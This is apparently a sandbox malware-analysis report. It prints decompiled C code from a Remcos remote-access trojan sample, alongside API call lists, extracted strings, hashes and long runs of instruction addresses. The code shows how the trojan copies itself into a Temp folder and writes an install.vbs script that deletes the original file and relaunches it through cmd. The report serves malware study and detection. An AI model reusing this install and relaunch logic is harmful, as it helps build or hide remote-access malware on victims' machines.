									 *(_t217 + _t460) = _t402;
									_t217 = _t217 + _t472;
									__eflags = _t402;
								} while (_t402 != 0);
								_push(_t402);
								_t218 = E0040247B();
								_t219 = E00401F87(0x46e5f0);
								_t220 = E0040247B();
								E00410CAF(E00401F87(0x46e5a8), __eflags, "exepath", _t491, 2 + _t220 * 2, _t219, _t218);
								E00430224(_t491);
								_t506 = _t504 + 0x1c;
								_t470 = 0x46e3a4;
								E00401E3B(0x46e3a4, _t222, __eflags, 0xd);
								_t454 = "0";
								__eflags = E0040EB23(__eflags);
								if(__eflags == 0) {
									L47:
									_push(_t275);
									_t129 = E00401F87(E00401E3B(_t470, _t454, __eflags, 0x34));
									_t507 = _t506 - 0x18;
									E00402076(_t275, _t507, _t129);
									_push("licence");
									_t455 = E00401F87(0x46e5a8);
									E00410AD6(0x46e5a8, _t131);
									_t508 = _t507 + 0x20;
									_t135 = E004374E4(_t133, E00401F87(E00401E3B(_t470, _t131, __eflags, 0x28)));
									 *0x46daf7 = _t135;
									__eflags = _t135 - 2;
									if(_t135 != 2) {
										__eflags = _t135 - _t275;
										if(_t135 == _t275) {
											_t393 = 0;
											__eflags = 0;
											goto L51;
										}
									} else {
										_t393 = _t275;
										L51:
										E004199B8(_t275, _t393, _t455);
										__eflags = 0;
										CreateThread(0, 0, E00419787, 0, 0, 0);
									}
									_t509 = _t508 - 0x18;
									E00402076(_t275, _t509, "Remcos Agent initialized");
									_t510 = _t509 - 0x18;
									E00402076(_t275, _t510, "i");
									E00417670(_t275, _t470);
									_t502 = _t510 + 0x30;
									_t140 = E00401F87(E00401E3B(_t470, _t455, __eflags, 0x37));
									_t142 = E00401F87(E00401E3B(_t470, _t455, __eflags, 0x10));
									_t144 = E00401F87(E00401E3B(_t470, _t455, __eflags, 0xf));
									__eflags =  *_t140;
									_t476 = 0x46e3a4;
									_t147 = E004374E4(_t145, E00401F87(E00401E3B(0x46e3a4, _t455,  *_t140, 0x36)));
									_t149 = E00401F87(E00401E3B(0x46e3a4, _t455, __eflags, 0x11));
									E004084B0(_t142,  *_t144 & 0x000000ff,  *_t142 & 0x000000ff, E00401F87(E00401E3B(0x46e3a4, _t455, __eflags, 0x31)), _t149, _t147, (_t143 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff);
									__eflags =  *((intOrPtr*)(E00401F87(E00401E3B(0x46e3a4, _t455, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t466 = CreateThread;
									} else {
										_t202 = 2;
										_t490 = E0042FF6D(_t455, 0x46e3a4, __eflags, _t202);
										 *_t490 = 0;
										_t391 = E00401E3B(0x46e3a4, _t455, __eflags, 0x35);
										_t206 = E00401F87(_t391);
										_t466 = CreateThread;
										__eflags =  *_t206;
										 *((char*)(_t490 + 1)) = _t391 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E0041630B, _t490, 0, 0);
										_t476 = 0x46e3a4;
									}
									__eflags =  *((intOrPtr*)(E00401F87(E00401E3B(_t476, _t455, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t196 = 2;
										_t489 = E0042FF6D(_t455, _t476, __eflags, _t196);
										 *_t489 = 1;
										_t387 = E00401E3B(0x46e3a4, _t455, __eflags, 0x35);
										_t199 = E00401F87(_t387);
										__eflags =  *_t199;
										__eflags = 0;
										 *((char*)(_t489 + 1)) = _t387 & 0xffffff00 |  *_t199 != 0x00000000;
										CreateThread(0, 0, E0041630B, _t489, 0, 0);
										_t476 = 0x46e3a4;
									}
									__eflags =  *((intOrPtr*)(E00401F87(E00401E3B(_t476, _t455, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x46da75 = 1;
										_t188 = E00401F87(E00401E3B(_t476, _t455, __eflags, 0x25));
										_t190 = E00401F87(E00401E3B(0x46e3a4, _t455, __eflags, 0x26));
										_t455 =  *_t188;
										E00401EEC(0x46e0d4,  *_t188, _t188, E004189FF( &_v780,  *_t188, _t190));
										E00401EE2();
										__eflags = 0;
										CreateThread(0, 0, E00401BBF, 0, 0, 0);
										_t476 = 0x46e3a4;
									}
									__eflags =  *((intOrPtr*)(E00401F87(E00401E3B(_t476, _t455, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t476 = E00401F87(E00401E3B(_t476, _t455, __eflags, 0x2c));
										_t185 = E004374E4(_t183, E00401F87(E00401E3B(0x46e3a4, _t455, __eflags, 0x2d)));
										__eflags =  *_t476;
										_t455 = _t185;
										__eflags =  *_t476 != 0;
										E0040A6AE(_t185);
									}
									E00401EEC(0x46e608, _t455, _t476, E0041778E( &_v772, _t466, __eflags));
									_t365 =  &_v776;
									E00401EE2();
									_t166 =  *0x46dd08;
									_t272 = 0;
									__eflags = _t166;
									if(_t166 != 0) {
										 *_t166(0);
									}
									CreateThread(_t272, _t272, E0040D0FF, _t272, _t272, _t272);
									__eflags =  *0x46dd42;
									if( *0x46dd42 != 0) {
										CreateThread(_t272, _t272, E0040FB05, _t272, _t272, _t272);
									}
									__eflags =  *0x46dd43;
									if( *0x46dd43 != 0) {
										CreateThread(_t272, _t272, E00410023, _t272, _t272, _t272);
									}
									_t168 =  *0x46c9c0; // 0x1
									_t169 = _t168 - _t272;
									__eflags = _t169;
									if(__eflags == 0) {
										goto L71;
									} else {
										__eflags = _t169 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L72;
										}
									}
									goto L73;
								} else {
									_t227 = E00401E3B(0x46e3a4, "0", __eflags, 0xd);
									_t514 = _t506 - 0x18;
									_t454 = _t227;
									E00417CCA(_t514, _t227);
									_t229 = E0040CE8E(__eflags);
									_t506 = _t514 + 0x18;
									__eflags = _t229 - _t275;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t275 = 3;
										goto L45;
									}
								}
							}
						}
					} else {
						_v780 = 0;
						_t268 = E004108B4(E00401F87(0x46e5a8), "WD",  &_v780);
						__eflags = _t268;
						if(_t268 != 0) {
							E00410D11(E00401F87(0x46e5a8), __eflags, "WD");
							E0040FDD3();
							L71:
							_push("User");
							L72:
							E004053F2(_t272, _t502 - 0x18, "Access Level: ", _t466, __eflags, E00402076(_t272,  &_v776));
							E00402076(_t272, _t502 - 4, "i");
							E00417670(_t272, _t466);
							_t365 =  &_v784;
							E00401FB9();
							L73:
							E004122C9();
							asm("int3");
							_push(_t476);
							_t486 = _t365 + 0x68;
							E0040D55F(_t272, _t486, _t486);
							_t287 = _t486;
							 *_t287 = 0x461828;
							 *_t287 = 0x4617e4;
							return E00431253(_t287);
						} else {
							goto L8;
						}
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v700;
							__eax = E0040D58E( &_v700, __edx, __eflags, "license_code.txt", 2);
							__ecx = 0x46e3a4;
							__ecx = E00401E3B(0x46e3a4, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v720;
							__eax = E0040E905( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							__eax = E0040D53F( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							L74();
							__ecx =  &_v744;
							E00401FB9() = 0;
							__eax = 1;
							__eflags = 1;
							L5:
							return _t97;
						}
					}
				}
			}




































































































                                                                                                0x0040c2e2
                                                                                                0x0040c2f8
                                                                                                0x0040c2fd
                                                                                                0x0040c300
                                                                                                0x0040c305
                                                                                                0x0040c30f
                                                                                                0x0040c314
                                                                                                0x0040c31e
                                                                                                0x0040c327
                                                                                                0x0040c32c
                                                                                                0x0040c330
                                                                                                0x0040c339
                                                                                                0x0040c33e
                                                                                                0x0040c344
                                                                                                0x0040c3ab
                                                                                                0x0040c3ab
                                                                                                0x0040c3c9
                                                                                                0x0040c3cc
                                                                                                0x0040c3ee
                                                                                                0x0040c3f4
                                                                                                0x0040c3fc
                                                                                                0x0040c405
                                                                                                0x0040c40e
                                                                                                0x0040c41d
                                                                                                0x0040c422
                                                                                                0x0040c429
                                                                                                0x0040c43a
                                                                                                0x0040c43c
                                                                                                0x0040c443
                                                                                                0x0040c44a
                                                                                                0x0040c44f
                                                                                                0x0040c451
                                                                                                0x0040c458
                                                                                                0x0040c45e
                                                                                                0x0040c486
                                                                                                0x0040c491
                                                                                                0x0040c49b
                                                                                                0x0040c49d
                                                                                                0x0040c49f
                                                                                                0x0040c4a7
                                                                                                0x0040c4ae
                                                                                                0x0040c4ae
                                                                                                0x0040c4cb
                                                                                                0x0040c4cd
                                                                                                0x0040c4d4
                                                                                                0x0040c4d6
                                                                                                0x0040c4e0
                                                                                                0x0040c4e2
                                                                                                0x0040c4e7
                                                                                                0x0040c4f9
                                                                                                0x0040c500
                                                                                                0x0040c508
                                                                                                0x0040c50a
                                                                                                0x0040c50d
                                                                                                0x0040c513
                                                                                                0x0040c519
                                                                                                0x0040c51e
                                                                                                0x0040c8a1
                                                                                                0x0040c8a5
                                                                                                0x0040c8aa
                                                                                                0x00000000
                                                                                                0x0040c524
                                                                                                0x0040c524
                                                                                                0x0040c534
                                                                                                0x0040c53a
                                                                                                0x0040c53f
                                                                                                0x0040c54a
                                                                                                0x0040c54f
                                                                                                0x0040c558
                                                                                                0x0040c55d
                                                                                                0x0040c568
                                                                                                0x0040c571
                                                                                                0x0040c576
                                                                                                0x0040c57f
                                                                                                0x0040c588
                                                                                                0x0040c581
                                                                                                0x0040c581
                                                                                                0x0040c581
                                                                                                0x0040c58d
                                                                                                0x0040c592
                                                                                                0x0040c597
                                                                                                0x0040c599
                                                                                                0x0040c59d
                                                                                                0x0040c59d
                                                                                                0x0040c5a2
                                                                                                0x0040c5a7
                                                                                                0x0040c5ab
                                                                                                0x0040c5b6
                                                                                                0x0040c5bd
                                                                                                0x0040c5c0
                                                                                                0x0040c5c2
                                                                                                0x0040c5c8
                                                                                                0x0040c5ca
                                                                                                0x0040c5d0
                                                                                                0x0040c5f4
                                                                                                0x0040c5f6
                                                                                                0x0040c5fb
                                                                                                0x0040c5fc
                                                                                                0x0040c5fe
                                                                                                0x0040c600
                                                                                                0x0040c600
                                                                                                0x0040c5d2
                                                                                                0x0040c5d2
                                                                                                0x0040c5d3
                                                                                                0x0040c5d9
                                                                                                0x0040c5dc
                                                                                                0x0040c5de
                                                                                                0x0040c5de
                                                                                                0x0040c5dc
                                                                                                0x0040c5d0
                                                                                                0x0040c5c8
                                                                                                0x0040c5c0
                                                                                                0x0040c615
                                                                                                0x0040c618
                                                                                                0x0040c61a
                                                                                                0x0040c61a
                                                                                                0x0040c635
                                                                                                0x0040c64e
                                                                                                0x0040c651
                                                                                                0x0040c668
                                                                                                0x0040c66b
                                                                                                0x0040c682
                                                                                                0x0040c685
                                                                                                0x0040c698
                                                                                                0x0040c69b
                                                                                                0x0040c6a8
                                                                                                0x0040c6ad
                                                                                                0x0040c6ad
                                                                                                0x0040c6b0
                                                                                                0x0040c6b0
                                                                                                0x0040c6b3
                                                                                                0x0040c6b6
                                                                                                0x0040c6b6
                                                                                                0x0040c6bb
                                                                                                0x0040c6bf
                                                                                                0x0040c6cc
                                                                                                0x0040c6e1
                                                                                                0x0040c6e6
                                                                                                0x0040c6ed
                                                                                                0x0040c6f9
                                                                                                0x0040c702
                                                                                                0x0040c707
                                                                                                0x0040c707
                                                                                                0x0040c6bf
                                                                                                0x0040c70c
                                                                                                0x0040c710
                                                                                                0x0040c8c0
                                                                                                0x0040c8cf
                                                                                                0x0040c8d7
                                                                                                0x0040c8f5
                                                                                                0x0040c8f7
                                                                                                0x0040c8fc
                                                                                                0x0040c90c
                                                                                                0x0040c911
                                                                                                0x00000000
                                                                                                0x0040c716
                                                                                                0x0040c716
                                                                                                0x0040c71d
                                                                                                0x0040c7b3
                                                                                                0x0040c723
                                                                                                0x0040c72e
                                                                                                0x0040c740
                                                                                                0x0040c755
                                                                                                0x0040c75a
                                                                                                0x0040c762
                                                                                                0x0040c768
                                                                                                0x0040c780
                                                                                                0x0040c79a
                                                                                                0x0040c7a1
                                                                                                0x0040c7a4
                                                                                                0x0040c7a5
                                                                                                0x0040c7a5
                                                                                                0x0040c7bd
                                                                                                0x0040c7c7
                                                                                                0x0040c7cf
                                                                                                0x0040c7d1
                                                                                                0x0040c7d2
                                                                                                0x0040c7db
                                                                                                0x0040c7de
                                                                                                0x0040c7e0
                                                                                                0x0040c7f2
                                                                                                0x0040c7e2
                                                                                                0x0040c7e8
                                                                                                0x0040c7ed
                                                                                                0x0040c7ed
                                                                                                0x0040c7f9
                                                                                                0x0040c802
                                                                                                0x0040c802
                                                                                                0x0040c804
                                                                                                0x0040c805
                                                                                                0x0040c805
                                                                                                0x0040c808
                                                                                                0x0040c80c
                                                                                                0x0040c80e
                                                                                                0x0040c80e
                                                                                                0x0040c813
                                                                                                0x0040c81b
                                                                                                0x0040c823
                                                                                                0x0040c82e
                                                                                                0x0040c84d
                                                                                                0x0040c853
                                                                                                0x0040c858
                                                                                                0x0040c85b
                                                                                                0x0040c864
                                                                                                0x0040c869
                                                                                                0x0040c875
                                                                                                0x0040c877
                                                                                                0x0040c916
                                                                                                0x0040c916
                                                                                                0x0040c922
                                                                                                0x0040c927
                                                                                                0x0040c92d
                                                                                                0x0040c932
                                                                                                0x0040c941
                                                                                                0x0040c943
                                                                                                0x0040c948
                                                                                                0x0040c95c
                                                                                                0x0040c967
                                                                                                0x0040c96d
                                                                                                0x0040c96f
                                                                                                0x0040c975
                                                                                                0x0040c977
                                                                                                0x0040c979
                                                                                                0x0040c979
                                                                                                0x00000000
                                                                                                0x0040c979
                                                                                                0x0040c971
                                                                                                0x0040c971
                                                                                                0x0040c97b
                                                                                                0x0040c97b
                                                                                                0x0040c980
                                                                                                0x0040c98c
                                                                                                0x0040c98c
                                                                                                0x0040c98e
                                                                                                0x0040c998
                                                                                                0x0040c99d
                                                                                                0x0040c9a7
                                                                                                0x0040c9ac
                                                                                                0x0040c9b1
                                                                                                0x0040c9bf
                                                                                                0x0040c9d1
                                                                                                0x0040c9e3
                                                                                                0x0040c9e8
                                                                                                0x0040c9ed
                                                                                                0x0040ca0a
                                                                                                0x0040ca1c
                                                                                                0x0040ca3b
                                                                                                0x0040ca53
                                                                                                0x0040ca55
                                                                                                0x0040ca9e
                                                                                                0x0040ca57
                                                                                                0x0040ca59
                                                                                                0x0040ca60
                                                                                                0x0040ca6c
                                                                                                0x0040ca73
                                                                                                0x0040ca75
                                                                                                0x0040ca7a
                                                                                                0x0040ca80
                                                                                                0x0040ca92
                                                                                                0x0040ca95
                                                                                                0x0040ca97
                                                                                                0x0040ca97
                                                                                                0x0040cab4
                                                                                                0x0040cab6
                                                                                                0x0040caba
                                                                                                0x0040cac1
                                                                                                0x0040cacb
                                                                                                0x0040cad2
                                                                                                0x0040cad4
                                                                                                0x0040cad9
                                                                                                0x0040cadf
                                                                                                0x0040caeb
                                                                                                0x0040caee
                                                                                                0x0040caf0
                                                                                                0x0040caf0
                                                                                                0x0040cb05
                                                                                                0x0040cb07
                                                                                                0x0040cb0d
                                                                                                0x0040cb1a
                                                                                                0x0040cb2f
                                                                                                0x0040cb34
                                                                                                0x0040cb47
                                                                                                0x0040cb50
                                                                                                0x0040cb55
                                                                                                0x0040cb61
                                                                                                0x0040cb63
                                                                                                0x0040cb63
                                                                                                0x0040cb78
                                                                                                0x0040cb7a
                                                                                                0x0040cb93
                                                                                                0x0040cba2
                                                                                                0x0040cba7
                                                                                                0x0040cbaa
                                                                                                0x0040cbad
                                                                                                0x0040cbb0
                                                                                                0x0040cbb0
                                                                                                0x0040cbc4
                                                                                                0x0040cbc9
                                                                                                0x0040cbcd
                                                                                                0x0040cbd2
                                                                                                0x0040cbd7
                                                                                                0x0040cbd9
                                                                                                0x0040cbdb
                                                                                                0x0040cbde
                                                                                                0x0040cbde
                                                                                                0x0040cbea
                                                                                                0x0040cbec
                                                                                                0x0040cbf3
                                                                                                0x0040cbff
                                                                                                0x0040cbff
                                                                                                0x0040cc01
                                                                                                0x0040cc08
                                                                                                0x0040cc14
                                                                                                0x0040cc14
                                                                                                0x0040cc16
                                                                                                0x0040cc1b
                                                                                                0x0040cc1b
                                                                                                0x0040cc1d
                                                                                                0x00000000
                                                                                                0x0040cc1f
                                                                                                0x0040cc1f
                                                                                                0x0040cc22
                                                                                                0x0040cc24
                                                                                                0x00000000
                                                                                                0x0040cc24
                                                                                                0x0040cc22
                                                                                                0x00000000
                                                                                                0x0040c87d
                                                                                                0x0040c881
                                                                                                0x0040c886
                                                                                                0x0040c889
                                                                                                0x0040c88d
                                                                                                0x0040c892
                                                                                                0x0040c897
                                                                                                0x0040c89a
                                                                                                0x0040c89c
                                                                                                0x00000000
                                                                                                0x0040c89e
                                                                                                0x0040c8a0
                                                                                                0x00000000
                                                                                                0x0040c8a0
                                                                                                0x0040c89c
                                                                                                0x0040c877
                                                                                                0x0040c710
                                                                                                0x0040c460
                                                                                                0x0040c464
                                                                                                0x0040c477
                                                                                                0x0040c47e
                                                                                                0x0040c480
                                                                                                0x0040cc39
                                                                                                0x0040cc43
                                                                                                0x0040cc48
                                                                                                0x0040cc48
                                                                                                0x0040cc4d
                                                                                                0x0040cc61
                                                                                                0x0040cc70
                                                                                                0x0040cc75
                                                                                                0x0040cc7d
                                                                                                0x0040cc81
                                                                                                0x0040cc86
                                                                                                0x0040cc86
                                                                                                0x0040cc8b
                                                                                                0x0040cc8c
                                                                                                0x0040cc8d
                                                                                                0x0040cc92
                                                                                                0x0040cc97
                                                                                                0x0040e07c
                                                                                                0x0040c19b
                                                                                                0x0040c1a7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040c480
                                                                                                0x0040c346
                                                                                                0x0040c346
                                                                                                0x0040c34a
                                                                                                0x00000000
                                                                                                0x0040c34c
                                                                                                0x0040c34c
                                                                                                0x0040c350
                                                                                                0x0040c352
                                                                                                0x00000000
                                                                                                0x0040c354
                                                                                                0x0040c354
                                                                                                0x0040c355
                                                                                                0x0040c35d
                                                                                                0x0040c361
                                                                                                0x0040c368
                                                                                                0x0040c372
                                                                                                0x0040c379
                                                                                                0x0040c37b
                                                                                                0x0040c37f
                                                                                                0x0040c384
                                                                                                0x0040c388
                                                                                                0x0040c38d
                                                                                                0x0040c391
                                                                                                0x0040c396
                                                                                                0x0040c39f
                                                                                                0x0040c3a1
                                                                                                0x0040c3a1
                                                                                                0x0040c3a2
                                                                                                0x0040c3a8
                                                                                                0x0040c3a8
                                                                                                0x0040c352
                                                                                                0x0040c34a

                                                                                                APIs
                                                                                                • OpenMutexA.KERNEL32 ref: 0040C495
                                                                                                • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C4A7
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C4AE
                                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C50D
                                                                                                • GetLastError.KERNEL32 ref: 0040C513
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\rem9090sta.exe,00000104), ref: 0040C534
                                                                                                  • Part of subcall function 0040E905: __EH_prolog.LIBCMT ref: 0040E90A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                                                                                                • String ID: (32 bit)$ (64 bit)$0f$Access Level: $Administrator$C:\Users\user\AppData\Local\Temp\rem9090sta.exe$Exe$Exe$Inj$ProductName$Remcos Agent initialized$Remcos-36FQQT$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$exepath$hpg$licence$license_code.txt$origmsc$pf$x(f
                                                                                                • API String ID: 1247502528-3844880028
                                                                                                • Opcode ID: 5ac75c2e02a552ee0e0f7491615d2c369b391271644b622b10bd505384b3a1d6
                                                                                                • Instruction ID: a0e48df29832305806efb2b49378476c8b0d2fe6d91567894ced15b4f1c176e2
                                                                                                • Opcode Fuzzy Hash: 5ac75c2e02a552ee0e0f7491615d2c369b391271644b622b10bd505384b3a1d6
                                                                                                • Instruction Fuzzy Hash: 7D32C7A0B042416BDB1577768C97B3E25998F81748F14053FF842BB2E2EEBC4D46839E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0043060E, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0043060E() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0043061A); // executed
				return _t1;
			}




                                                                                                0x00430613
                                                                                                0x00430619

                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_0003061A,004302FD), ref: 00430613
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: f64ca50f8ca8c96064be5bf3767f0d5dfdc7d9965405c52fc8f0cd8c4cf5388a
                                                                                                • Instruction ID: 2b8caaebd9721374acd760d330e640496e57b004c21848727b2dd92476e4fa8c
                                                                                                • Opcode Fuzzy Hash: f64ca50f8ca8c96064be5bf3767f0d5dfdc7d9965405c52fc8f0cd8c4cf5388a
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040A9AB, Relevance: 35.3, APIs: 7, Strings: 13, Instructions: 324fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E0040A9AB(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
				char _v9;
				int _v20;
				char _v44;
				char _v68;
				char _v92;
				char _v116;
				char _v140;
				char _v164;
				char _v188;
				char _v212;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				void* _t63;
				signed int _t67;
				signed int _t68;
				int _t70;
				void* _t79;
				void* _t91;
				void* _t92;
				int _t94;
				void* _t99;
				void* _t100;
				WCHAR* _t113;
				int _t115;
				intOrPtr _t118;
				WCHAR* _t123;
				int _t124;
				void* _t139;
				intOrPtr* _t152;
				int _t153;
				intOrPtr* _t207;
				int _t208;
				intOrPtr* _t235;
				void* _t236;
				void* _t239;
				void* _t249;
				void* _t250;
				intOrPtr _t254;
				void* _t257;
				void* _t259;
				intOrPtr* _t260;

				_t235 = __edx;
				_v9 = __ecx;
				_t260 = __edx;
				_v20 = 0;
				_t257 = __edx + 2;
				do {
					_t62 =  *_t235;
					_t235 = _t235 + 2;
				} while (_t62 != 0);
				_t236 = _t235 - _t257;
				_t268 = _t236;
				if(_t236 == 0) {
					_t143 = _a4;
					_t238 = __ecx;
					_t63 = E00418A4B( &_v92, __ecx, _t143);
					_t259 = 0x46e590;
					E00401EEC(0x46e590, _t238, _t260, _t63);
				} else {
					CreateDirectoryW(E00401EDD(0x46e5c0), 0); // executed
					_t143 = _a4;
					_t139 = E00403098(_t143,  &_v92, E00407677( &_v44, 0x46e5c0, _t268, "\\"), 0x46e5c0, _t268, _t143);
					_t259 = 0x46e590;
					E00401EEC(0x46e590, _t138, _t260, _t139);
					E00401EE2();
				}
				E00401EE2();
				_t152 = E00401EDD(_t259);
				_t67 = 0x46daf8;
				while(1) {
					_t239 =  *_t67;
					if(_t239 !=  *_t152) {
						break;
					}
					if(_t239 == 0) {
						L10:
						_t153 = 0;
						_t68 = 0;
						L12:
						if(_t68 != 0) {
							_t70 = CopyFileW("C:\Users\jones\AppData\Local\Temp\rem9090sta.exe", E00401EDD(_t259), _t153); // executed
							__eflags = _t70;
							if(_t70 != 0) {
								L23:
								E0040A8BA(0x46e578, E00401EDD(0x46e578)); // executed
								__eflags = _a8 - 1;
								_pop(_t157);
								if(__eflags != 0) {
									L28:
									E00403098(_t143,  &_v92, E00404260(_t143,  &_v68, E00437AEF(_t143, _t157, __eflags, L"Temp")), _t259, __eflags, L"\\install.vbs");
									E00401EE2();
									E00404260(_t143,  &_v44, L"WScript.Sleep 1000\n");
									E0040778C(_t143,  &_v44, _t259, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
									__eflags = _a12 - 1;
									_t144 = "\n";
									if(__eflags == 0) {
										_t100 = E00404260("\n",  &_v212, "C:\Users\jones\AppData\Local\Temp\rem9090sta.exe");
										E00403303(E00403098(_t144,  &_v68, E00403098(_t144,  &_v116, E00403022( &_v140, E00403098(_t144,  &_v164, E00404260("\n",  &_v188, L"fso.DeleteFile "), _t259, __eflags, "\""), _t100), _t259, __eflags, "\""), _t259, __eflags, _t144));
										E00401EE2();
										E00401EE2();
										E00401EE2();
										E00401EE2();
										E00401EE2();
										E00401EE2();
									}
									_t79 = E00404260(_t144,  &_v116, L"\"\"\", 0");
									E00403303(E00403098(_t144,  &_v212, E00403022( &_v188, E0040440A(_t144,  &_v164, E00404260(_t144,  &_v68, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), __eflags, _t259), _t79), _t259, __eflags, _t144));
									E00401EE2();
									E00401EE2();
									E00401EE2();
									E00401EE2();
									E00401EE2();
									E0040778C(_t144,  &_v44, _t259, L"fso.DeleteFile(Wscript.ScriptFullName)");
									_t91 = E00401EDD( &_v92);
									_t92 = E0040247B();
									_t94 = E00418337(E00401EDD( &_v44), _t92 + _t92, _t91, 0); // executed
									__eflags = _t94;
									if(_t94 == 0) {
										L33:
										E00401EE2();
										return E00401EE2();
									} else {
										_t99 = ShellExecuteW(0, L"open", E00401EDD( &_v92), 0x46079c, 0x46079c, 0); // executed
										__eflags = _t99 - 0x20;
										if(_t99 <= 0x20) {
											goto L33;
										}
										ExitProcess(0); // executed
									}
								}
								_t113 = E00401EDD(_t259);
								_t143 = SetFileAttributesW;
								SetFileAttributesW(_t113, 7);
								_t249 = _t260 + 2;
								_t157 = 0;
								__eflags = 0;
								do {
									_t115 =  *_t260;
									_t260 = _t260 + 2;
									__eflags = _t115;
								} while (_t115 != 0);
								__eflags = _t260 - _t249;
								if(__eflags != 0) {
									_t157 = 0x46e5c0;
									SetFileAttributesW(E00401EDD(0x46e5c0), 7);
								}
								goto L28;
							}
							__eflags = _v9 - 0x36;
							if(_v9 == 0x36) {
								goto L23;
							}
							_t207 = _t260;
							_t250 = _t207 + 2;
							do {
								_t118 =  *_t207;
								_t207 = _t207 + 2;
								__eflags = _t118 - _v20;
							} while (_t118 != _v20);
							_t208 = _t207 - _t250;
							__eflags = _t208;
							_push(_t143);
							if(_t208 == 0) {
								E00401EEC(_t259, 0x36, _t260, E00418A4B( &_v68, 0x36));
							} else {
								E00401EEC(_t259, _t128, _t260, E00403098(_t143,  &_v140, E00403098(_t143,  &_v116, E00418A4B( &_v68, 0x36, _t260), _t259, __eflags, "\\"), _t259, __eflags));
								E00401EE2();
								E00401EE2();
							}
							E00401EE2();
							_t123 = E00401EDD(_t259);
							_t143 = 0x46daf8;
							_t124 = CopyFileW(0x46daf8, _t123, 0);
							__eflags = _t124;
							if(_t124 != 0) {
								goto L23;
							} else {
								E00409DFE(0x46daf8, _t259, 0x46daf8);
								return 0;
							}
						}
						E0040A8BA(0x46e578, E00401EDD(0x46e578));
						return 1;
					}
					_t254 =  *((intOrPtr*)(_t67 + 2));
					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
						break;
					}
					_t67 = _t67 + 4;
					_t152 = _t152 + 4;
					if(_t254 != 0) {
						continue;
					}
					goto L10;
				}
				asm("sbb eax, eax");
				_t68 = _t67 | 0x00000001;
				_t153 = 0;
				__eflags = 0;
				goto L12;
			}















































                                                                                                0x0040a9ab
                                                                                                0x0040a9b8
                                                                                                0x0040a9bc
                                                                                                0x0040a9be
                                                                                                0x0040a9c1
                                                                                                0x0040a9c4
                                                                                                0x0040a9c4
                                                                                                0x0040a9c7
                                                                                                0x0040a9ca
                                                                                                0x0040a9cf
                                                                                                0x0040a9cf
                                                                                                0x0040a9d8
                                                                                                0x0040aa22
                                                                                                0x0040aa25
                                                                                                0x0040aa2b
                                                                                                0x0040aa31
                                                                                                0x0040aa39
                                                                                                0x0040a9da
                                                                                                0x0040a9e3
                                                                                                0x0040a9e9
                                                                                                0x0040aa02
                                                                                                0x0040aa08
                                                                                                0x0040aa10
                                                                                                0x0040aa18
                                                                                                0x0040aa1d
                                                                                                0x0040aa41
                                                                                                0x0040aa4d
                                                                                                0x0040aa4f
                                                                                                0x0040aa54
                                                                                                0x0040aa54
                                                                                                0x0040aa5a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040aa5f
                                                                                                0x0040aa76
